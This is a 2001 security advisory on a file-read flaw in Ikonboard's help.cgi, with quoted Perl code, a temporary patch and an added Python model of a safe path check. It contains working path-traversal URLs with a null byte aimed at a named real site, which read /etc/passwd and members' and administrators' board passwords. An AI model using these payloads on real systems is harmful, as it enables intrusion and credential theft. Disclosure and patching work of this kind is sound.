Ikonboard Exploit (v.2.1.7b)
Author: Martin J. Muench
Date: 11 Mar 2001
-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com
-=[ Summary ]=-
This is another bug in the Ikonboard.
Anyone can read any file on the remote system with the privileges of the web server.
-=[ Problem ]=-
File: help.cgi
---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the raw value of the 'helpon' query parameter.
---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open(FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it builds the file name, runs it through the filter and opens it.
-> $inhelpon is part of that file name, remember?! ;-)
OK, I am not going to post the whole filter it uses, because they really managed
to write a filter that is 24 lines long.
And in the end they forgot to filter the backslash, so we can simply attach the 'poison
null-byte' to '$inhelpon' and escape the '.dat' suffix.
And of course the script doesn't check for "..", so we can specify any path we want.
-=[ Exploit ]=-
Example:
http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
- would show the password file, if it is readable with the privileges of the web server.
http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
- replace <member> with the member name and it shows you his/her board-password.
(works with Administrator accounts too)
-=[ Patches ]=-
Not yet available.
You could fix the script temporarily by inserting the following line below line 45 in 'help.cgi':
$inhelpon =~ s/\///g;
This is lame, but it works.
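As an added example (not code from the advisory or from Ikonboard), a Python model of the help.cgi path construction next to an allow-list check that rejects the null byte, '..' and path separators and confirms the resolved file still sits under the help directory; the install path is a constructed placeholder for $ikondir. Note that the one-line hotfix above strips slashes only, while the allow-list also rejects the null byte.

```python
import os
import re
from typing import Optional

# Constructed placeholder for the board's "$ikondir"; the real value is
# whatever the Ikonboard install uses.
IKONDIR = "/var/www/ikonboard"
HELP_DIR = os.path.realpath(os.path.join(IKONDIR, "help"))

# Help topics are plain names: letters, digits, '_' and '-'. Anything else
# ('.', '/', '\\', NUL, ...) is rejected before it ever reaches a path.
TOPIC_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_help_path(helpon: str) -> str:
    """Model of the page's line 95: the name is glued into the path unchecked.

    The Perl of the day handed the string to the C open(), which stops at
    the first NUL, so the ".dat" suffix is silently dropped. The lexical
    normpath() shows which file the web server would actually open.
    """
    path = f"{HELP_DIR}/{helpon}.dat"
    nul = path.find("\0")
    if nul >= 0:
        path = path[:nul]               # what the C-level open() sees
    return os.path.normpath(path)       # '..' components resolved


def safe_help_path(helpon: str) -> Optional[str]:
    """Return the help file to open, or None when the request is rejected.

    Two independent checks: an allow-list on the topic name, then a
    canonical-path check that the result still lives inside HELP_DIR.
    """
    if not TOPIC_RE.fullmatch(helpon):
        return None
    candidate = os.path.realpath(os.path.join(HELP_DIR, helpon + ".dat"))
    # Defence in depth: even if the allow-list were loosened later, refuse
    # anything whose canonical path has escaped the help directory.
    if os.path.commonpath([HELP_DIR, candidate]) != HELP_DIR:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("general", "../../../../../etc/passwd\0"):
        print(repr(name), "->", vulnerable_help_path(name), "|", safe_help_path(name))
```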
Martin J. Münch <mjm(-@-)codito.de>
http://www.codito.de
"Perl - The only language that looks the same before and after RSA encryption."
- Keith Bostic